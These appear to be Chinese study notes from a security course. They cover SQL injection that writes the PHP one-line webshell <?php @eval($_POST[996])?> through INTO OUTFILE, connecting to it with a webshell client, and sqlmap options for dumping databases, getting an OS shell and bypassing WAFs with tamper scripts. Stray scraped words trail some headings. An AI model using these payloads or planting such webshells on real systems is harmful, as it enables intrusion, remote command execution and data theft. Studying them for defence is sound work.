sql上傳木馬

第十週筆記—SQLmap和sql注入上傳木馬

目錄php

SQL注入

上傳木馬

前提:html

  • 要知道網站的絕對路徑
  • 具備寫入權限
select 'hello world' into outfile 'c:/abcdef.txt' --路徑的斜槓用 /或者\\ --把hello world寫入文件中 實戰攻擊語句: select * from boy where hid='' union select 11,'hello world'into outfile 'C:/111.txt'; select user() --查詢當前用戶名 http://192.168.99.171/test2/sqli/example10.php?catid='3 ' union select '<?php @eval($_POST[996])?>',2,3,4 into outfile 'C:/xampp/htdocs/test2/zxh2.php' --+' --後兩行爲sql注入語句,寫入一句話木馬 

用菜刀鏈接,網址爲木馬的路徑(不是絕對路徑)
一句話木馬:<?php @eval($_POST[996])?> --密碼爲996
用order by(排序)語句試出有多少列web

PHP學習網站:
phpstudysql

SQLmap

六大模塊

  • 輸入
  • 輸出
  • 發送數據
  • 接受數據
  • 注入點檢測
  • 真正攻擊模塊

命令

sqlmap.pyshell

參數

-r          //讀取文件 -u //讀取網址 -v 3 //查看sql注入的命令 -flush //清除緩存 --is-dba //是否爲dba --os-shell //獲取系統shell --dbs //查看全部數據庫,命令用完即刪 --threads //線程數 --current-db //查看當前網站用的庫,命令用完即刪 -D "[庫名]" //使用指定庫 -T "[表名]" //使用指定表 --count //查找有幾列,命令用完即刪 --colums //查找列名,顯示列名和他的類型 -C "[列名]" //使用指定列名,能夠用逗號隔開 --dump //把指定列名dump下來,慎用,金融網站犯法 --start 1 //從第一條dump到第二條(不是從0開始取) --stop 2 

三種請求方式

參見圖片數據庫

取得系統shell

自動上傳木馬
用x或者q退出,不然會留下木馬緩存

原理:傳上去一個具備遠程命令執行漏洞的頁面ide

條件學習

  1. 絕對路徑
  2. dba超級管理員

命令參數:測試

--os-shell --web-root="[絕對路徑]" //須要上傳木馬的目錄 

sqlmap高級注入

--identify-waf //自動測試waf防火牆 --tamper [tamper腳本名稱] //手工指定混碼腳本繞過,混碼:空白符用%20或者%09代替, //腳本在sqlmap/tamper文件下,多個腳本用逗號隔開 
相關文章
相關標籤/搜索